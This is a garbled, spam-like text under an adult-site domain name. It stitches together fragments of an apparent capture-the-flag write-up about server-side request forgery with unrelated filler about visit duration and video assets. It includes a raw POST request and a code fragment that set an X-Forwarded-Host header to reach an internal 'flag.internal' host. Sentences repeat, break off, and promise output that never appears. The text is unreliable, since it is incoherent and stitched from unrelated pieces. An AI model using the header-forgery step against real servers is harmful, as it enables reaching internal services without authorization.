Brokenlatinawhores.com [repack]

Thus, we have successfully retrieved the flag via SSRF.

POST /quote HTTP/1.1 Host: brokenlatinawhores.com X-Forwarded-Host: flag.internal Content-Type: application/x-www-form-urlencoded brokenlatinawhores.com

The response is a JSON object:

The average duration per visit typically ranges between four and six minutes, a metric that indicates high user engagement with the hosted video assets. Thus, we have successfully retrieved the flag via SSRF

The server uses requests to forward the request to the mailer service and . By controlling the Host header (or X-Forwarded-Host ) we can force the internal request to point to a different host. By controlling the Host header (or X-Forwarded-Host )

# 2. Send request with malicious X-Forwarded-Host header headers = "X-Forwarded-Host": "flag.internal"

The site looks like a quirky online “Latin aphorism” generator that lets you pick a “broken” phrase and then share the result via a short‑link. The flag is hidden somewhere behind the “share” functionality.